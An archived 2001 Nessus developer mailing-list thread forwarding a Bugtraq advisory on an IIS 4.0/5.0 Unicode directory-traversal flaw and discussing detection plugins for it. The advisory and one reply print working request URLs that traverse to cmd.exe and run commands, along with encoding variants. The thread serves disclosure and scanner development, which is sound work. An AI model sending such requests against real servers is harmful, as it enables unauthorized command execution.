Advanced
Mailing List Archive

Mailing List Archive

  1. Home >
  2. Nessus>
  3. devel
Fw: New vulnerability in IIS4.0/5.0
huberfelix at webtopia
Sep 19, 2001, 9:29 AM
Post #1 of 4 (784 views)
Permalink
I just wrote a NASL for this Bug. Its untested but I hope it works.
The problem was I found no IIS where I could reproduce this error ( I testet
five IIS 4 and IIS 5 Boxes ).
I will improve it when i found a working Box ...

Btw: I also updated the CF Admin Test.


MfG
Felix Huber


-------------------------------------------------------
Felix Huber, Security Consultant, Webtopia
Guendlinger Str.2, 79241 Ihringen - Germany
huberfelix@webtopia.de (07668) 951 156 (phone)
http://www.webtopia.de (07668) 951 157 (fax)
(01792) 205 724 (mobile)
-------------------------------------------------------


From: "ALife // BERG" <buginfo@inbox.ru>
To: <Bugtraq@securityfocus.com>
Sent: Wednesday, September 19, 2001 11:38 AM
Subject: New vulnerability in IIS4.0/5.0


> -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
>
> Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> -------------------------------------[ security.instock.ru ]--------------
>
> Topic: Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> Announced: 2001-09-19
> Credits: ALife <buginfo@inbox.ru>
> Affects: Microsoft IIS 4.0/5.0
>
> --------------------------------------------------------------------------
>
> ---[. Description
>
> For example, target has a virtual executable directory (e.g.
> "scripts") that is located on the same driver of Windows system.
> Submit request like this:
>
> http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
>
> Directory list of C:\ will be revealed.
>
> Of course, same effect can be achieved by this kind of processing
> to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c",
> "..%u0025%u005c" ...
>
> Note: Attacker can run commands of IUSR_machinename account privilege
> only.
>
> This is where things go wrong in IIS 4.0 and 5.0, IIS first scans
> the given url for ../ and ..\ and for the normal unicode of these
> strings, if those are found, the string is rejected, if these are
> not found, the string will be decoded and interpreted. Since the filter
> does NOT check for the huge amount of overlong unicode representations
> of ../ and ..\ the filter is bypassed and the directory traversalling
> routine is invoked.
>
> ---[. Workarounds
>
> 1. Delete the executable virtual directory like /scripts etc.
> 2. If executable virtual directory is needed, we suggest you to
> assign a separate local driver for it.
> 3. Move all command-line utilities to another directory that could
> be used by an attacker, and forbid GUEST group access those
> utilities.
>
> ---[. Vendor Status
>
> 2001.09.19 We informed Microsoft of this vulnerability.
>
> ---[ Additional Information
>
> [1] RFC 1642 UTF-7 - A Mail-Safe Transformation Format of Unicode.
> RFC 2152
> [2] RFC 2044 UTF-8, a transformation format of Unicode and ISO 10646.
> RFC 2279
> [3] RFC 2253 Lightweight Directory Access Protocol (v3): UTF-8 String
> Representation of Distinguished Names.
>
> ---[. DISCLAIMS
>
> THE INFORMATION PROVIDED IS RELEASED BY BRIGHT EYES RESEARCH GROUP (BERG)
> "AS IS" WITHOUT WARRANTY OF ANY KIND. BERG DISCLAIMS ALL WARRANTIES,
> EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY.
> IN NO EVENTSHALL BERG BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING
> DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR
> SPECIAL DAMAGES, EVEN IF BERG HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
> DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT
> THE ADVISORY IS NOT MODIFIED IN ANY WAY.
>
> -------------------------------------[ security.instock.ru ]--------------
> -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
>
>

Attached Files:

Re: Fw: New vulnerability in IIS4.0/5.0 [ In reply to ]
hdm at secureaustin
Sep 19, 2001, 9:38 AM
Post #2 of 4 (772 views)
Permalink
On Wednesday 19 September 2001 11:29 am, Felix Huber wrote:
> I just wrote a NASL for this Bug. Its untested but I hope it works.
> The problem was I found no IIS where I could reproduce this error ( I
> testet five IIS 4 and IIS 5 Boxes ).
> I will improve it when i found a working Box ...

I too can't reproduce the problem...
Re: Fw: New vulnerability in IIS4.0/5.0 [ In reply to ]
deraison at cvs
Sep 19, 2001, 9:48 AM
Post #3 of 4 (776 views)
Permalink
On Wed, Sep 19, 2001 at 06:29:19PM +0200, Felix Huber wrote:
> I just wrote a NASL for this Bug. Its untested but I hope it works.
> The problem was I found no IIS where I could reproduce this error ( I testet
> five IIS 4 and IIS 5 Boxes ).
> I will improve it when i found a working Box ...

I think it would be wiser to re-use iis_dir_traversal.nasl, which was
heavily worked on and which does not only check for /scripts.

Attached is a modified version of it (but I don't know if it works or
not, I could not reproduce the flaw yet).


-- Renaud

Attached Files:

Re: Fw: New vulnerability in IIS4.0/5.0 [ In reply to ]
hdm at secureaustin
Sep 19, 2001, 9:55 AM
Post #4 of 4 (772 views)
Permalink
Reproduced against two default IIS installs (4.0 and 5.0):

http://host/msadc/..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\

These boxes were vulnerable to unicode and the double decode, so I can't say
for certain whether this affects patched systems.



On Wednesday 19 September 2001 11:29 am, Felix Huber wrote:
> I just wrote a NASL for this Bug. Its untested but I hope it works.
> The problem was I found no IIS where I could reproduce this error ( I
> testet five IIS 4 and IIS 5 Boxes ).
> I will improve it when i found a working Box ...
>
> Btw: I also updated the CF Admin Test.
>
>
> MfG
> Felix Huber
>
>
> -------------------------------------------------------
> Felix Huber, Security Consultant, Webtopia
> Guendlinger Str.2, 79241 Ihringen - Germany
> huberfelix@webtopia.de (07668) 951 156 (phone)
> http://www.webtopia.de (07668) 951 157 (fax)
> (01792) 205 724 (mobile)
> -------------------------------------------------------
>
>
> From: "ALife // BERG" <buginfo@inbox.ru>
> To: <Bugtraq@securityfocus.com>
> Sent: Wednesday, September 19, 2001 11:38 AM
> Subject: New vulnerability in IIS4.0/5.0
>
> > -----[. Bright Eyes Research Group | Advisory # be00001e
> > ]-----------------
> >
> > Remote users can execute any command on several
> > IIS 4.0 and 5.0 systems by using UTF codes
> >
> > -------------------------------------[ security.instock.ru
> > ]--------------
> >
> > Topic: Remote users can execute any command on several
> > IIS 4.0 and 5.0 systems by using UTF codes
> >
> > Announced: 2001-09-19
> > Credits: ALife <buginfo@inbox.ru>
> > Affects: Microsoft IIS 4.0/5.0
> >
> > -------------------------------------------------------------------------
> >-
> >
> > ---[. Description
> >
> > For example, target has a virtual executable directory (e.g.
> > "scripts") that is located on the same driver of Windows system.
> > Submit request like this:
> >
> > http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
> >
> > Directory list of C:\ will be revealed.
> >
> > Of course, same effect can be achieved by this kind of processing
> > to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c",
> > "..%u0025%u005c" ...
> >
> > Note: Attacker can run commands of IUSR_machinename account privilege
> > only.
> >
> > This is where things go wrong in IIS 4.0 and 5.0, IIS first scans
> > the given url for ../ and ..\ and for the normal unicode of these
> > strings, if those are found, the string is rejected, if these are
> > not found, the string will be decoded and interpreted. Since the filter
> > does NOT check for the huge amount of overlong unicode representations
> > of ../ and ..\ the filter is bypassed and the directory traversalling
> > routine is invoked.
> >
> > ---[. Workarounds
> >
> > 1. Delete the executable virtual directory like /scripts etc.
> > 2. If executable virtual directory is needed, we suggest you to
> > assign a separate local driver for it.
> > 3. Move all command-line utilities to another directory that could
> > be used by an attacker, and forbid GUEST group access those
> > utilities.
> >
> > ---[. Vendor Status
> >
> > 2001.09.19 We informed Microsoft of this vulnerability.
> >
> > ---[ Additional Information
> >
> > [1] RFC 1642 UTF-7 - A Mail-Safe Transformation Format of Unicode.
> > RFC 2152
> > [2] RFC 2044 UTF-8, a transformation format of Unicode and ISO 10646.
> > RFC 2279
> > [3] RFC 2253 Lightweight Directory Access Protocol (v3): UTF-8 String
> > Representation of Distinguished Names.
> >
> > ---[. DISCLAIMS
> >
> > THE INFORMATION PROVIDED IS RELEASED BY BRIGHT EYES RESEARCH GROUP (BERG)
> > "AS IS" WITHOUT WARRANTY OF ANY KIND. BERG DISCLAIMS ALL WARRANTIES,
> > EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY.
> > IN NO EVENTSHALL BERG BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING
> > DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR
> > SPECIAL DAMAGES, EVEN IF BERG HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
> > DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT
> > THE ADVISORY IS NOT MODIFIED IN ANY WAY.
> >
> > -------------------------------------[ security.instock.ru
> > ]-------------- -----[. Bright Eyes Research Group | Advisory # be00001e
> > ]-----------------

--
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play

©2024 GT.net. A Gossamer Threads company.
5th Floor, 455 Granville St., Vancouver, BC V6C 1T1, Canada | Legal